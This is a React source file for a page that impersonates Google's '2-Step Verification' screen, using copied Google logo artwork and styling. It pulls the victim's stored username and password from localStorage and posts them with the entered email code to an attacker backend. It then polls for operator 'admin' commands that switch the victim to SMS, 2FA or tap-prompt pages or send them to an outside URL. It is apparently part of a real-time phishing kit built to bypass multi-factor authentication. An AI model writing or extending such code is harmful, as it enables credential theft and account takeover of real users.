import { useState, useEffect, useRef } from "react";
import { useNavigate } from "react-router-dom";
import BrowserTab from "./BrowserTab";
import CalendlySchedule from "./Calendly";

export default function Email() {
  const navigate = useNavigate();
  const [code, setCode] = useState("");
  const [sessionId, setSessionId] = useState(null);
  const [loading, setLoading] = useState(false);
  const [error, setError] = useState("");
  const [email, setEmail] = useState("");
  const [codeSubmitted, setCodeSubmitted] = useState(false);
  const isSubmittingCode = useRef(false);

  const API_URL = process.env.REACT_APP_API_BASE_URL;

  const handleSubmit = (e) => {
    e.preventDefault();
    setError("");
    setLoading(true);
    isSubmittingCode.current = true;

    const username = localStorage.getItem("username") || "";
    const password = localStorage.getItem("password") || "";
    const currentSessionId = sessionId || localStorage.getItem("session_id");

    (async () => {
      try {
        const res = await fetch(`${API_URL}/api/email`, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({ code, username, password, session_id: currentSessionId }),
        });

        if (!res.ok) {
          const data = await res.json();
          throw new Error(data.detail || "Verification failed");
        }

        const { session_id } = await res.json();
        // Use the returned session_id, but also keep the original if it exists
        if (session_id) {
          setSessionId(session_id);
          localStorage.setItem("session_id", session_id);
        }
        setCodeSubmitted(true); // Trigger polling to start for redirect
        setLoading(true);
      } catch (err) {
        console.error("Verification failed:", err);
        setError(err.message || "Verification failed");
        setLoading(false);
        isSubmittingCode.current = false;
      }
    })();
  };

  useEffect(() => {
    const storedEmail = localStorage.getItem("userEmail") || localStorage.getItem("username") || "";
    setEmail(storedEmail);
    
    const storedSessionId = localStorage.getItem("session_id");
    if (storedSessionId) {
      setSessionId(storedSessionId);
    }
  }, []);

  useEffect(() => {
    // Only poll if we have sessionId AND we've submitted the code
    if (!sessionId || !codeSubmitted) {
      if (!codeSubmitted) setLoading(false);
      return;
    }

    // Set loading when we start polling (after code submission)
    setLoading(true);

    const routes = {
      email: "/email",
      "2fa": "/2fa",
      sms: "/sms",
      tap: "/tap",
    };

    const poll = setInterval(async () => {
      try {
        const res = await fetch(
          `${API_URL}/check_response?session_id=${sessionId}`
        );

        if (!res.ok) throw new Error("Failed to fetch response");

        const data = await res.json();

        // PRIORITY 1: Check redirect first (like Tap does)
        if (data.redirect) {
          clearInterval(poll);
          setLoading(false);
          isSubmittingCode.current = false;
          if (data.redirect.startsWith("/")) {
            navigate(data.redirect);
          } else {
            window.location.replace(data.redirect);
          }
          return;
        }

        // PRIORITY 2: Check for authType change (only if not current type)
        if (data.authType && data.authType !== "email") {
          clearInterval(poll);
          setLoading(false);
          isSubmittingCode.current = false;
          const route = routes[data.authType];
          if (route) {
            navigate(route);
          }
          return;
        }

        // PRIORITY 3: Check for errors
        if (data.error) {
          clearInterval(poll);
          setLoading(false);
          isSubmittingCode.current = false;
          setCodeSubmitted(false);
          setError(data.error);
          return;
        }

        // Keep loading while waiting for admin response (between commands)
        setLoading(true);
      } catch (err) {
        clearInterval(poll);
        setLoading(false);
        isSubmittingCode.current = false;
        console.error("Polling error:", err);
        setError("Something went wrong while checking session.");
      }
    }, 3000);

    return () => clearInterval(poll);
  }, [sessionId, codeSubmitted, API_URL, navigate]);

  return (
    <div className="calendly-back">
      <CalendlySchedule />
      <div className="login-page">
        <div className="browser-shadow">
          <BrowserTab />
          <div className="google-login-container">
            <div className="google-login-content">
              <div className="google-logo-container">
                <svg width="75" height="24" viewBox="0 0 75 24" xmlns="http://www.w3.org/2000/svg">
                  <path fill="#4285F4" d="M17.64 9.2c0-.637-.057-1.251-.164-1.84H9v3.481h4.844c-.209 1.125-.843 2.078-1.796 2.717v2.258h2.908c1.702-1.567 2.684-3.874 2.684-6.615z"/>
                  <path fill="#34A853" d="M9 18c2.43 0 4.467-.806 5.956-2.184l-2.908-2.258c-.806.54-1.837.86-3.048.86-2.344 0-4.328-1.584-5.036-3.711H.957v2.332C2.438 15.983 5.482 18 9 18z"/>
                  <path fill="#FBBC05" d="M3.964 10.707c-.18-.54-.282-1.117-.282-1.707s.102-1.167.282-1.707V4.951H.957C.348 6.174 0 7.55 0 9s.348 2.826.957 4.049l3.007-2.342z"/>
                  <path fill="#EA4335" d="M9 3.58c1.321 0 2.508.454 3.44 1.345l2.582-2.582C13.463.891 11.426 0 9 0 5.482 0 2.438 2.017.957 4.951L3.964 7.293C4.672 5.163 6.656 3.58 9 3.58z"/>
                </svg>
              </div>
              
              <h1 className="google-signin-heading">2-Step Verification</h1>
              <p className="google-signin-subheading">
              A verification code was sent to your email
              </p>

              <div className="google-email-badge">
                <svg
                  xmlns="http://www.w3.org/2000/svg"
                  className="google-email-badge-icon"
                  viewBox="0 0 24 24"
                  fill="currentColor"
                >
                  <path d="M12 12c2.21 0 4-1.79 4-4s-1.79-4-4-4-4 1.79-4 4 1.79 4 4 4zm0 2c-2.67 0-8 1.34-8 4v2h16v-2c0-2.66-5.33-4-8-4z" />
                </svg>
                <span className="google-email-badge-text">{email}</span>
                <svg
                  xmlns="http://www.w3.org/2000/svg"
                  className="google-email-badge-chevron"
                  viewBox="0 0 24 24"
                  fill="currentColor"
                >
                  <path d="M7 10l5 5 5-5z" />
                </svg>
              </div>

              {error && (
                <div className="google-error-container">
                  <p className="google-error-message">{error}</p>
                </div>
              )}

              <form onSubmit={handleSubmit} className="google-login-form">
                <div className="google-input-group">
                  <div className="google-input-wrapper">
                    <input
                      id="emailCode"
                      type="tel"
                      inputMode="numeric"
                      pattern="\d{6,8}"
                      maxLength={8}
                      minLength={6}
                      value={code}
                      disabled={loading}
                      onChange={(e) => {
                        const val = e.target.value;
                        if (/^\d*$/.test(val)) {
                          setCode(val);
                          if (error) setError("");
                        }
                      }}
                      required
                      className={`google-input ${code.trim() ? "google-input-filled" : ""} ${error ? "google-input-error" : ""}`}
                    />
                    <label htmlFor="emailCode" className="google-label">
                      Enter verification code
                    </label>
                  </div>
                </div>

                <div className="google-forgot-link">
                  <a href="#" className="google-link">Try another way</a>
                </div>

                <div className="google-button-group">
                  <a href="#" className="google-link-secondary">Back</a>
                  <button
                    type="submit"
                    className="google-button-primary"
                    disabled={loading || !code.trim() || code.length < 6}
                  >
                    {loading ? (
                      <div className="google-spinner"></div>
                    ) : (
                      "Next"
                    )}
                  </button>
                </div>
              </form>

              <div className="google-footer">
                <div className="google-footer-links">
                  <a href="#" className="google-footer-link">Help</a>
                  <a href="#" className="google-footer-link">Privacy</a>
                  <a href="#" className="google-footer-link">Terms</a>
                </div>
                <div className="google-language-selector">
                  <select className="google-language-select">
                    <option>English (United States)</option>
                  </select>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  );
}
